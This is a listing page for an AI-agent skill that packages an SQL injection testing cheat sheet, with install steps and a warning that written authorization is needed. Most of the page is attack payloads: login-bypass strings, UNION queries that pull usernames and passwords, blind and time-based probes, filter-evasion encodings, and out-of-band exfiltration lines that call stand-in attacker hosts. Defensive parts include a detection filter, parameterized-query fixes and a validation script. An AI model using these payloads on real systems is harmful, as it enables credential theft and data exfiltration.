Perform authorized security tests to detect, exploit, and validate defenses against SQL injection vulnerabilities in web applications.
Source: ClawHub. View on ClawSkills
Method 1: Command-line install (recommended)
Recommended (no need to install clawhub beforehand):
npx clawhub@latest --dir ~/.claude/skills install sql-injection-testing
Or use the clawhub CLI (must be installed beforehand):
clawhub --dir ~/.claude/skills install sql-injection-testing
⚠️ Requires Node.js 18+. No Node? Use Method 2 below to download the ZIP directly.
Method 2: Manual download (no Node required)
Download the ZIP, extract it, place the folder at the following path, and restart the agent:
Install path
~/.claude/skills/sql-injection-testing/
Comprehensive SQL injection vulnerability assessment techniques for web applications, covering detection, exploitation, and defense validation.
USE WHEN:
DON'T USE WHEN:
⚠️ LEGAL REQUIREMENT: Written penetration testing authorization required before use.
---
Common injectable parameters:
URL params: ?id=1, ?user=admin, ?category=books
Form fields: username, password, search, comments
Cookies: session_id, user_preference
HTTP headers: User-Agent, Referer, X-Forwarded-For
-- Single quote test
'
-- Double quote test
"
-- Comment sequences
--
#
/**/
-- Semicolon for query stacking
;
Watch for:
-- True condition (should return data)
page.asp?id=1 or 1=1
page.asp?id=1' or 1=1--
page.asp?id=1" or 1=1--
-- False condition (should return nothing/error)
page.asp?id=1 and 1=2
page.asp?id=1' and 1=2--
Compare responses between true/false to confirm injection.
---
-- Step 1: Determine column count
ORDER BY 1--
ORDER BY 2--
ORDER BY 3--
-- Continue until error occurs
-- Step 2: Find displayable columns
UNION SELECT NULL,NULL,NULL--
UNION SELECT 'a',NULL,NULL--
UNION SELECT NULL,'a',NULL--
-- Step 3: Extract data
UNION SELECT username,password,NULL FROM users--
UNION SELECT table_name,NULL,NULL FROM information_schema.tables--
UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--
-- MSSQL
1' AND 1=CONVERT(int,(SELECT @@version))--
-- MySQL (XPATH)
1' AND extractvalue(1,concat(0x7e,(SELECT @@version)))--
-- PostgreSQL
1' AND 1=CAST((SELECT version()) AS int)--
-- Character extraction
1' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a'--
1' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='b'--
-- Conditional responses
1' AND (SELECT COUNT(*) FROM users WHERE username='admin')>0--
-- MySQL
1' AND IF(1=1,SLEEP(5),0)--
1' AND IF((SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a',SLEEP(5),0)--
-- MSSQL
1'; WAITFOR DELAY '0:0:5'--
-- PostgreSQL
1'; SELECT pg_sleep(5)--
-- MSSQL DNS exfiltration
1; EXEC master..xp_dirtree '\\attacker-server.com\share'--
-- MySQL DNS
1' UNION SELECT LOAD_FILE(CONCAT('\\\\',@@version,'.attacker.com\\a'))--
-- Oracle HTTP
1' UNION SELECT UTL_HTTP.REQUEST('http://attacker.com/'||(SELECT user FROM dual)) FROM dual--
---
-- Classic bypass payloads
admin'--
admin'/*
' OR '1'='1
' OR '1'='1'--
' OR '1'='1'/*
') OR ('1'='1
') OR ('1'='1'--
-- Query transformation example
-- Original: SELECT * FROM users WHERE username='input' AND password='input'
-- Injected (username: admin'--):
-- SELECT * FROM users WHERE username='admin'--' AND password='anything'
-- Password check bypassed!
---
-- URL encoding
%27 (single quote)
%22 (double quote)
%23 (hash)
-- Double URL encoding
%2527 (single quote)
-- Hex strings (MySQL)
SELECT * FROM users WHERE name=0x61646D696E -- 'admin'
-- Comment substitution
SELECT/**/username/**/FROM/**/users
-- Tab character
SELECT%09username%09FROM%09users
-- Newline
SELECT%0Ausername%0AFROM%0Ausers
-- Case variation
SeLeCt, sElEcT, SELECT
-- Inline comments
SEL/*bypass*/ECT
UN/*bypass*/ION
-- Double writing (if filter removes once)
SELSELECTECT → SELECT
UNUNIONION → UNION
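The evasion tricks listed above (URL and double URL encoding, inline comments, tab and newline substitution, case variation, double writing) all defeat a filter that matches raw input once. The following is an added Python example, not part of the original skill, showing the defender's counterpart: normalise the input to a fixed point first, then match. Because it matches rather than deletes keywords, double writing such as SELSELECTECT does not help an attacker either. Patterns and thresholds are illustrative assumptions, not a production WAF rule set.

```python
import re
from urllib.parse import unquote

# Illustrative patterns (assumption) matched against the normalised input.
# No \b around select/union/from: comment removal can glue tokens together
# (SELECT/**/username -> selectusername) and the match must still fire.
SUSPICIOUS = [
    re.compile(p) for p in (
        r"union.*select",
        r"select.*from",
        r"\bor\s*'?\d+'?\s*=\s*'?\d+",          # or 1=1  /  ' or '1'='1
        r"sleep\s*\(|waitfor\s+delay|pg_sleep\s*\(",
        r"information_schema",
    )
]

def normalize(value: str, max_rounds: int = 5) -> str:
    """Undo the layered encodings a filter bypass relies on.

    Each pass URL-decodes once, removes /*...*/ comments, turns %09/%0A
    whitespace into single spaces and lowercases. It repeats until the
    string stops changing, so double encoding (%2527) unwraps fully.
    """
    prev, rounds = None, 0
    while value != prev and rounds < max_rounds:
        prev, rounds = value, rounds + 1
        value = unquote(value)                               # %27 -> '
        value = re.sub(r"/\*.*?\*/", "", value, flags=re.S)  # SEL/**/ECT -> SELECT
        value = re.sub(r"\s+", " ", value).strip().lower()   # tabs/newlines -> space
    return value

def is_suspicious(raw: str) -> bool:
    """True if the normalised input looks like one of the probes above."""
    norm = normalize(raw)
    return any(p.search(norm) for p in SUSPICIOUS)

if __name__ == "__main__":
    # Constructed sample inputs: one benign, three from the cheat-sheet.
    for sample in ("books", "UN/*bypass*/ION%09SeLeCt%2527",
                   "SELECT%0Ausername%0AFROM%0Ausers", "1' AND IF(1=1,SLEEP(5),0)--"):
        print(repr(sample), "->", repr(normalize(sample)), is_suspicious(sample))
```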
---
| Database | Version Query |
|----------|---------------|
| MySQL | SELECT @@version or SELECT version() |
| MSSQL | SELECT @@version |
| PostgreSQL | SELECT version() |
| Oracle | SELECT banner FROM v$version |
| SQLite | SELECT sqlite_version() |
---
-- MySQL/MSSQL: List tables
SELECT table_name FROM information_schema.tables WHERE table_schema=database()
-- List columns
SELECT column_name FROM information_schema.columns WHERE table_name='users'
-- Oracle equivalent
SELECT table_name FROM all_tables
SELECT column_name FROM all_tab_columns WHERE table_name='USERS'
---
| Purpose | Payload |
|---------|---------|
| Basic test | ' or " |
| Boolean true | OR 1=1-- |
| Boolean false | AND 1=2-- |
| Comment (MySQL) | # or -- |
| Comment (MSSQL) | -- |
| UNION probe | UNION SELECT NULL-- |
| Time delay | AND SLEEP(5)-- |
| Auth bypass | ' OR '1'='1 |
---
1. Insert ' → Check for error
2. Insert " → Check for error
3. Try: OR 1=1-- → Check for behavior change
4. Try: AND 1=2-- → Check for behavior change
5. Try: ' WAITFOR DELAY '0:0:5'-- → Check for delay
---
// Vulnerable: user input concatenated into the SQL string
const query = `SELECT * FROM users WHERE id = '${userId}'`;
// Parameterized query
const query = 'SELECT * FROM users WHERE id = $1';
const result = await db.query(query, [userId]);
// OR use ORM
const user = await prisma.user.findUnique({ where: { id: userId } });
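To validate the fix the way the query transformation example above describes, here is an added Python example (not part of the original skill) that runs the page's bypass payloads through both a concatenated and a parameterized login query. It assumes an in-memory SQLite table constructed inline as a stand-in for the Postgres `$1` placeholder shown above; SQLite uses `?` placeholders and also honours the `--` comment.

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    """Constructed sample data: one account in an in-memory users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 's3cret')")
    return conn

def login_vulnerable(conn, username: str, password: str):
    """The 'before' pattern: input is spliced into the query text, so a
    quote plus a comment sequence rewrites the WHERE clause."""
    query = (f"SELECT id FROM users WHERE username='{username}' "
             f"AND password='{password}'")
    return conn.execute(query).fetchone()

def login_parameterized(conn, username: str, password: str):
    """The fix: placeholders. The driver sends the values separately, so
    the query shape is fixed and admin'-- is just a username that does
    not exist."""
    query = "SELECT id FROM users WHERE username=? AND password=?"
    return conn.execute(query, (username, password)).fetchone()

def validate_fix() -> dict:
    """Run the cheat-sheet's bypass payloads through both code paths and
    report whether each one logged in without the real password."""
    conn = make_db()
    results = {}
    for payload in ("admin'--", "' OR '1'='1'--"):
        results[payload] = {
            "vulnerable": login_vulnerable(conn, payload, "wrong") is not None,
            "parameterized": login_parameterized(conn, payload, "wrong") is not None,
        }
    return results

if __name__ == "__main__":
    for payload, outcome in validate_fix().items():
        print(repr(payload), outcome)
```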
---
| Problem | Solution |
|---------|----------|
| No error messages | Use blind injection (boolean/time-based) |
| UNION fails | Check column count with ORDER BY |
| WAF blocking | Use encoding/evasion techniques |
| Payload not executing | Verify correct comment syntax for DB type |
| Time-based inconsistent | Use longer delays (10+ seconds) |
---
After installing SQL Injection Testing, you can say the following to the AI to trigger it:
Help me get started with SQL Injection Testing
Explains what SQL Injection Testing does, walks through the setup, and runs a quick demo based on your current project
Use SQL Injection Testing to perform authorized security tests to detect, exploit, and validate ...
Invokes SQL Injection Testing with the right parameters and returns the result directly in the conversation
What can I do with SQL Injection Testing in my developer & devops workflow?
Lists the top use cases for SQL Injection Testing, with example commands for each scenario
Place the skill folder in the ~/.claude/skills/sql-injection-testing/ directory (user level, available to all projects) or in .claude/skills/sql-injection-testing/ (project level). After restarting the AI client, invoke it explicitly with /sql-injection-testing, or let the AI discover and use it automatically based on context.
SQL Injection Testing supports Claude, Cursor and OpenClaw, and integrates with these AI platforms to extend their capabilities.
SQL Injection Testing is free to install and use. See the repository for license information.
SQL Injection Testing belongs to the "Developer & DevOps" category; skills in this category help AI agents perform professional tasks in this area.
Automate my developer & devops tasks using SQL Injection Testing
Identifies repetitive steps in your workflow and sets up SQL Injection Testing to handle them automatically